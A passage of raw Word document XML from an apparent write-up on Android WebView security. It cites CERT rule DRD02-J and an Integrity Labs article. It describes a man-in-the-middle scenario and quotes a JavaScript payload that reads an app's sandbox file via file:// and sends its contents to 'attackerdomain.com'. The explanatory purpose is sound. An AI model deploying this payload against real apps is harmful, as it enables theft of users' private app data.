          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="494C4E"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00D24FC3">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="494C4E"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="494C4E"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="494C4E"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ompliant Code Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D24FC3">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="494C4E"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. Retrieved from wiki.sei.cmu.edu. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E55B567" w14:textId="191D0E28" w:rsidR="00343A3C" w:rsidRDefault="00343A3C" w:rsidP="00343A3C">
      <w:pPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="494C4E"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B518E44" w14:textId="44EE662F" w:rsidR="00343A3C" w:rsidRPr="00343A3C" w:rsidRDefault="00343A3C" w:rsidP="00D52AC4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="300" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidR="00D52AC4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>another</w:t>
      </w:r>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> scenario, an attacker </w:t>
      </w:r>
      <w:r w:rsidR="00D52AC4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">would be </w:t>
      </w:r>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">able to intercept the communication of the app </w:t>
      </w:r>
      <w:r w:rsidR="00D52AC4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00D52AC4" w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>manipulate</w:t>
      </w:r>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the content. Using an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00D52AC4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">would </w:t>
      </w:r>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>seem</w:t>
      </w:r>
      <w:r w:rsidR="00D52AC4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be</w:t>
      </w:r>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the best way to do that.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D52AC4" w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker will be able to see the HTTP request but without exfiltrated data. </w:t>
      </w:r>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The attacker can try and replace the content returned to the app with a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t> payload that would allow to exfiltrate files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E67E41" w14:textId="77777777" w:rsidR="00343A3C" w:rsidRPr="00343A3C" w:rsidRDefault="00343A3C" w:rsidP="00343A3C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22CB977A" w14:textId="77777777" w:rsidR="00343A3C" w:rsidRPr="00343A3C" w:rsidRDefault="00343A3C" w:rsidP="00343A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444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>xhr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777EF5D0" w14:textId="77777777" w:rsidR="00343A3C" w:rsidRPr="00343A3C" w:rsidRDefault="00343A3C" w:rsidP="00343A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444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>xhr.onreadystatechange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA92C3D" w14:textId="77777777" w:rsidR="00343A3C" w:rsidRPr="00343A3C" w:rsidRDefault="00343A3C" w:rsidP="00343A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444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>xhr.readyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> == </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>XMLHttpRequest.DONE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61130DC7" w14:textId="77777777" w:rsidR="00343A3C" w:rsidRPr="00343A3C" w:rsidRDefault="00343A3C" w:rsidP="00343A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444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>window.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>.replace('https://attackerdomain.com/?exfiltrated='+xhr.responseText);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33048188" w14:textId="77777777" w:rsidR="00343A3C" w:rsidRPr="00343A3C" w:rsidRDefault="00343A3C" w:rsidP="00343A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444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEA0A02" w14:textId="77777777" w:rsidR="00343A3C" w:rsidRPr="00343A3C" w:rsidRDefault="00343A3C" w:rsidP="00343A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444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038ED322" w14:textId="77777777" w:rsidR="00343A3C" w:rsidRPr="00343A3C" w:rsidRDefault="00343A3C" w:rsidP="00343A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444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>xhr.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>('GET', 'file:///data/data/pt.integrity.labs.webview_remote/files/sandbox_file.txt', true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1946821E" w14:textId="539876D2" w:rsidR="00343A3C" w:rsidRDefault="00343A3C" w:rsidP="00343A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444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>xhr.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00343A3C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B13312E" w14:textId="77777777" w:rsidR="00343A3C" w:rsidRPr="00343A3C" w:rsidRDefault="00343A3C" w:rsidP="00343A3C">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30" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10B5473C" w14:textId="77777777" w:rsidR="00343A3C" w:rsidRPr="00343A3C" w:rsidRDefault="00343A3C" w:rsidP="00343A3C">
      <w:pPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38A70D85" w14:textId="411E0A35" w:rsidR="009947F4" w:rsidRPr="00324837" w:rsidRDefault="009947F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324837">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387A66E0" w14:textId="08D2F098" w:rsidR="009947F4" w:rsidRPr="00AF7489" w:rsidRDefault="001B3441" w:rsidP="00AF7489">
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Lallier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> C., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Klieber</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> W. </w:t>
      </w:r>
      <w:r w:rsidR="00A03E81" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>(201</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00A03E81" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>October</w:t>
      </w:r>
      <w:r w:rsidR="00A03E81" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidR="00A03E81" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">DRD02-J. Do not allow WebView to access sensitive local resource through file scheme. </w:t>
      </w:r>
      <w:r w:rsidR="00A03E81" w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Retrieved from </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00A03E81" w:rsidRPr="00AF7489">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
          </w:rPr>
          <w:t>https://wiki.sei.cmu.edu/confluence/display/android/DRD02-J.+Do+not+allow+WebView+to+access+sensitive+local+resource+through+file+scheme</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6DBFC142" w14:textId="3EF48C41" w:rsidR="00AF7489" w:rsidRPr="00AF7489" w:rsidRDefault="00AF7489" w:rsidP="00AF7489">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">André, C. (2018, May 15). Reviewing Android </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Webviews</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fileAccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF7489">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack vectors. Retrieved July 26, 2020, from </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00AF7489">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://labs.integrity.pt/articles/review-android-webviews-fileaccess-attack-vectors/index.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
